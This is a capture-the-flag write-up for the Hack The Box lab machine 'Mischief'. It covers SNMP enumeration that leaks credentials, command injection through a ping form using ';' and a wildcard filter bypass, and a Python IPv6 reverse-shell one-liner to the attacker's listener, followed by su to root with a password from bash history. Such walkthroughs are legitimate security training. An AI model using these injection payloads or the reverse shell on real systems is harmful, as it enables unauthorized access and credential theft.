HTB Mischief

10.10.10.92 | 50 pts | Tricked Badge

PART 1 : INITIAL RECON

$ nmap --min-rate 1000 -p- -sT -sU -v 10.10.10.92

  22/tcp   open  ssh
  3366/tcp open  creativepartnr
  161/udp  open  snmp

$ nmap -oN mischief -p 22,161,3366 -sC -sT -sU -sV -v 10.10.10.92

  22/tcp   open          ssh            OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
  |   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
  |_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
  3366/tcp open          caldav         Radicale calendar and contacts server (Python BaseHTTPServer)
  | http-auth:
  | HTTP/1.0 401 Unauthorizedx0D
  |_  Basic realm=Test
  | http-methods:
  |_  Supported Methods: GET HEAD
  |_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
  |_http-title: Site doesn't have a title (text/html).
  161/udp  open          snmp           SNMPv1 server; net-snmp SNMPv3 server (public)
  | snmp-info:
  |   enterprise: net-snmp
  |   engineIDFormat: unknown
  |   engineIDData: b6a9f84e18fef95a00000000
  |   snmpEngineBoots: 19
  |_  snmpEngineTime: 59m39s
  | snmp-interfaces:
  |   lo
  |     IP address: 127.0.0.1  Netmask: 255.0.0.0
  |     Type: softwareLoopback  Speed: 10 Mbps
  |     Status: up
  |     Traffic stats: 0.67 Kb sent, 0.67 Kb received
  |   Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
  |     IP address: 10.10.10.92  Netmask: 255.255.255.0
  |     MAC address: 00:50:56:b9:2c:07 (VMware)
  |     Type: ethernetCsmacd  Speed: 1 Gbps
  |     Status: up
  |_    Traffic stats: 618.08 Kb sent, 23.39 Mb received
  | snmp-netstat:
  |   TCP  0.0.0.0:22           0.0.0.0:0
  |   TCP  0.0.0.0:3366         0.0.0.0:0
  |   TCP  10.10.10.92:22       10.10.14.213:32850
  |   TCP  10.10.10.92:22       10.10.14.213:32864
  |   TCP  10.10.10.92:22       10.10.15.54:40920
  |   TCP  10.10.10.92:22       10.10.16.63:40704
  |   TCP  10.10.10.92:3366     10.10.14.213:47812
  |   TCP  10.10.10.92:3366     10.10.14.213:47814
  |   TCP  10.10.10.92:3366     10.10.14.213:47816
  |   TCP  10.10.10.92:3366     10.10.14.213:47818
  |   TCP  10.10.10.92:3366     10.10.14.213:47820
  |   TCP  127.0.0.1:3306       0.0.0.0:0
  |   TCP  127.0.0.53:53        0.0.0.0:0
  |   UDP  0.0.0.0:161          *:*
  |   UDP  0.0.0.0:34424        *:*
  |_  UDP  127.0.0.53:53        *:*
  | snmp-sysdescr: Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
  |_  System uptime: 59m39.09s (357909 timeticks)
  |_snmp-win32-software:
  Service Info: Host: Mischief; OS: Linux; CPE: cpe:/o:linux:linux_kernel

NOTE(S):

  • An SNMP service is running at UDP PORT 161.

  • The web service running on TCP PORT 3366 is served using a Python BaseHTTPServer.

PART 2 : PORT ENUMERATION

UDP PORT 161 (snmp)

$ snmpwalk -c public 10.10.10.92 -v 2c

  iso.3.6.1.2.1.1.1.0 = STRING: "Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64"
  iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
  iso.3.6.1.2.1.1.3.0 = Timeticks: (4642890) 12:53:48.90
  iso.3.6.1.2.1.1.4.0 = STRING: "Me "
  iso.3.6.1.2.1.1.5.0 = STRING: "Mischief"
  iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
  ...omitted...

Processes (hrSWRunEntry):

  iso.3.6.1.2.1.25.4.2.1.4.608 = STRING: "python"
  ...omitted...
  iso.3.6.1.2.1.25.4.2.1.5.608 = STRING: "-m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/"
  ...omitted...

  • The process for the hosted webservice is found.

  • HTTP Authentication credentials are found - loki : godofmischiefisloki

  • The web service is hosted from /home/loki/hosted

  • IPv6 Addresses (ipAddressIfIndex):

    $ snmpwalk -c public -v 2c 10.10.10.92 iso.3.6.1.2.1.4.34.1.3.2.16

  iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
  iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.245.54 = INTEGER: 2
  iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.245.54 = INTEGER: 2

    • The 1st one is the Loopback Address.

    • The 2ns one is the Unique-Local Address.

    • The 3rd one is the Link Local Address.

Evaluate the IPv6 address of the system:

unique_local_oid=$(snmpwalk -c public -v 2c 10.10.10.92 iso.3.6.1.2.1.4.34.1.3.2.16.222 | sed -ne 's/^.*\(222.*\) =.*$/\1/p')

unique_local_dec=$(echo $unique_local_oid | tr '.' ' ')

unique_local_hex=$(printf '%02x' $unique_local_dec)

ipv6=$(echo -n $unique_local_hex | fold -w4 | tr '\n' ':')
$ echo $ipv6

  dead:beef:0000:0000:0250:56ff:fea4:29f2

See if there are other ports open for IPv6:

$ nmap -6 --min-rate 1000 -p- -v dead:beef:0000:0000:0250:56ff:fea4:29f2

  22/tcp   open     ssh
  80/tcp   open     http

$ nmap -6 -p22,80 -sC -sV -v $ipv6

  22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
  |   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
  |_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
  80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: 400 Bad Request
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • There is another http service open using IPv6.

TCP PORT 3366 (http, IPv4)

http://10.10.10.136:

Using the credentials found during the SNMP enumeration -- loki:godofmischiefisloki

Two sets of credentials are found:

Username

Password

loki

godofmischiefisloki

loki

trickeryanddeceit

TCP PORT 80 (http, IPv6)

http://[dead:beef:0000:0000:0250:56ff:fea4:29f2]/

Attempting to log in using the credentials found on PORT 3366:

The credential pair, administrator : trickeryanddeceit, worked and so far, only the ping command could be executed. There is also a message written below.

In my home directory, i have my password in a file called credentials, Mr Admin

PART 3 : EXPLOITATION

Bypass the command execution in the service running on port 80:

$ ping -c 2 127.0.0.1; id

  PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
  64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.020 ms
  64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.061 ms

  --- 127.0.0.1 ping statistics ---
  2 packets transmitted, 2 received, 0% packet loss, time 1028ms
  rtt min/avg/max/mdev = 0.020/0.040/0.061/0.021 ms
  Command was executed succesfully!

$ id; ping -c 2 127.0.0.1

  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  Command was executed succesfully!

The command execution could be bypassed by using a ;.

PART 4 : GENERATE USER SHELL

Take the file called credentials from the home directory:

$ echo /home/*; ping -c 2 127.0.0.1

  /home/loki
  Command was executed succesfully!

$ echo /home/loki/*; ping -c 2 127.0.0.1

  /home/loki/credentials /home/loki/hosted /home/loki/user.txt
  Command was executed succesfully!

$ cat /home/loki/credentials; ping -c 2 127.0.0.1

  Command is not allowed.

$ cat /home/loki/cred*; ping -c 2 127.0.0.1

  pass: lokiisthebestnorsegod
  Command was executed succesfully!

The word, credentials, is being filtered out by the service but it was bypassed by using a wildcard.

Logging in via ssh:

$ ssh -l loki 10.10.10.92
  The authenticity of host '10.10.10.92 (10.10.10.92)' can't be established.
  ECDSA key fingerprint is SHA256:deaxXTK7ORthfGcKdblPRUmgNrU20oclqMbwVj3hzYI.
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  Warning: Permanently added '10.10.10.92' (ECDSA) to the list of known hosts.
$ loki@10.10.10.92's password: lokiisthebestnorsegod

$ cat user.txt

  bf58........................0060

PART 5.1 : PRIVILEGE ESCALATION (loki -> root)

Check for interesting files in loki's home directory:

$ ls -lah ~

  -rw------- 1 loki loki  192 Jul 14  2018 .bash_history
  ...omitted...
  -rw-rw-r-- 1 loki loki   28 May 17  2018 credentials
  ...omitted...
  -rw-r--r-- 1 loki loki    0 May 14  2018 .sudo_as_admin_successful
  -r-------- 1 loki loki   33 May 17  2018 user.txt
  ...omitted...

$ cat .bash_history

  python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
  ...omitted...
  sudo su
  su
  exit
  su root
  ...omitted...
  exit

There was an attempt to execute su root in the .bash_history. There is also a .sudo_as_admin_successful which might mean the attempt was successful.

A previously unknown credential pair was used to initialize the python simpleHTTPAuthServer and this might be a lead for the root password.

Attempting to execute su root:

$ su root

  -bash: /bin/su: Permission denied

Checking privileges for the su command:

$ getfacl -R -s / 2>/dev/null | grep -A 9 su

  # file: usr/bin/sudo
  # owner: root
  # group: root
  # flags: s--
  user::rwx
  user:loki:r--
  group::r-x
  mask::r-x
  other::r-x

  # file: bin/su
  # owner: root
  # group: root
  # flags: s--
  user::rwx
  user:loki:r--
  group::r-x
  mask::r-x
  other::r-x

The user, loki, only has read (r--) permissions for both su and sudo. Good thing we still have access to another user -- www-data

PART 5.2 : PRIVILEGE ESCALATION (www-data -> root)

Set-up a listener for IPv6:

$ socat TCP6-LISTEN:4444 stdout

Execute an IPv6 reverse shell on the web service running on port 80:

$ python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::100e",4444,0,0));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'; ping -c 2 127.0.0.1

While inside the reverse shell:

$ id 

  uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ su
$ Password: lokipasswordmischieftrickery

$ id

  uid=0(root) gid=0(root) groups=0(root)

$ cat /root/root.txt

  The flag is not here, get a shell to find it!

$ find / -name root.txt -type f -uid 0

  /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
  /root/root.txt

$ cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt

  ae15........................7807
PreviousHTB FlujabNextChallenge Writeups

Last updated